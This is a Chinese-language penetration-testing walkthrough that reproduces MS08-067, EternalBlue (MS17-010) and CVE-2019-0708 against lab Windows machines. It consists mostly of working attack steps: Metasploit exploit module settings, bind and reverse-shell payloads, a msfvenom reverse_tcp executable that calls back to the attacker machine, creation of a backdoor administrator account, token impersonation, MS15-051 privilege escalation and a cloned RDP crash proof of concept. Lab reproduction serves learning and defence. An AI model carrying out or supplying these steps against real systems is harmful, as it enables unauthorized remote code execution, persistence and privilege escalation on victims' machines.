MSF本地漏洞复现
MS08-067复现
MS08-067攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。当用户在受影响的系统上收到RPC请求时,该漏洞会允许远程执行代码,攻击者可以在未经身份验证情况下利用此漏洞运行任意代码。它影响的Windows系统包括:Windows 2000、Windows XP、Windows Server 2003
-
靶机:Windows XP;IP:192.168.1.20
-
攻击机:Kali系统;IP:192.168.1.7
利用条件:
- 靶机445端口开启
- 靶机防火墙关闭(netsh firewall set opmode mode=disable)
Nmap扫描探测该漏洞是否存在:
nmap -n -p 445 --script smb-vuln-ms08-067 192.168.1.20 --open
Msfconsole找到漏洞利用模块:
search ms08-067
use exploit/windows/smb/ms08_067_netapi
set rhost 192.168.1.20
show targets
set target 45
#根据targets信息选择靶机信息
set payload generic/shell_bind_tcp #设置payload
# 设置本地监听地址和端口
set lhost 192.168.1.7
set lport 1122
options #最终参数设置如下
run # 建立会话,进行命令执行
ps # 查看当前靶机进程
migrate 672 # 迁移到pid为672的程序进程上
run vnc # 监控靶机桌面
KALI&XP傻傻的分不清楚
background #挂起后台
sessions -l #查看所有会话
sessions -i 1 #调用会话,1是指会话序号
MS017-010
攻击者利用永恒之蓝MS017-010漏洞在目标系统上可以执行任意代码。
复现环境
攻击机:kali-linux :192.168.1.7
靶机:windows 7 :192.168.1.8
利用条件:
1.smb 445端口开启
2.防火墙关闭
3.kali与靶机建立连接
漏洞利用:
nmap探测漏洞
nmap --script smb-vuln* 192.168.1.8
加载msf进行漏洞利用:
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.1.8
run
利用成功,命令执行:
添加用户且新增到管理员组
net user test 123456 /add
net localgroup administrator test /add
远程连接
exit
rdesktop 192.168.1.8
使用刚刚创建的test用户进行登陆
提权:
此时我们只是win7的管理员用户,需要进行系统权限的提升:
# 利用msf生成1.exe的payload
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.7 lport=1122 -f exe >1.exe
利用admin管理员用户将1.exe放进靶机win 7里面。
# kali设置监听会话
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
# kali设置本例监听地址和端口,然后开始监听
set lhost 192.168.1.7
set lport 1122
run
等待win 7 运行1.exe,建立meterpreter连接
尝试会话劫持
getuid
use incognito # 劫持session
list_tokens -u # 列出session
# 发现只是管理员权限,没有更高权限会话。无法进行会话劫持
background # 挂起会话
利用ms15_051提权:
use exploit/windows/local/ms15_051_client_copy_image
set session 1 #直接设置我刚刚挂载的会话
run
提权成功:
CVE-2019-0708复现
ps:复现这个漏洞有点跑题了,使用msf一直失败没有会话产生,所以下面是直接利用EXP复现的。
正文:
该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。影响Windows系统版本包括:
- windows2003
- windows2008
- windows2008 R2
- windows xp
- win 7
复现环境:
kali攻击机:192.168.242.142
windows2008 R2靶机:192.168.1.8
利用条件:
1.靶机防火墙关闭
2.靶机3389端口开启
3.攻击机能通信靶机
复现步骤:
1.下载POC
git clone https://github.com/n1xbyte/CVE-2019-0708.git
2.为脚本文件添加可执行权限
chmod 777 crashpoc.py
3.如果没有以下安装模块,需要另外安装
pip3 install impacket
pip3 install Structure
pip list #查看自己安装的所有python模块
4.利用脚本攻击
python crashpoc.py 192.168.1.8 64
#192.168.1.8 是目标IP 64是指系统版本
ps:不知道为啥脚本会报错,但是攻击成功能够 ok。不太求甚解…
5.攻击成功,合影留念:
=========================================================
推荐阅读
-
Windows CVE-2019-0708 远程桌面代码执行漏洞复现
-
网络安全渗透测试反序列化漏洞分析与复现工作
-
网络安全渗透测试反序列化漏洞分析与复现工作
-
SpringBoot SpEL表达式注入漏洞-分析与复现
-
「漏洞预警」Apache Flink 任意 Jar 包上传导致远程代码执行漏洞复现
-
ES文件管理器被曝漏洞百出 文件会泄露给本地网络上的任何人
-
FreeBSD user-ppp协议实现本地栈溢出漏洞
-
Symark PowerBroker 客户端多个本地命令溢出漏洞
-
Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现
-
Thinkphp 2.x、3.0-3.1版代码执行漏洞分析复现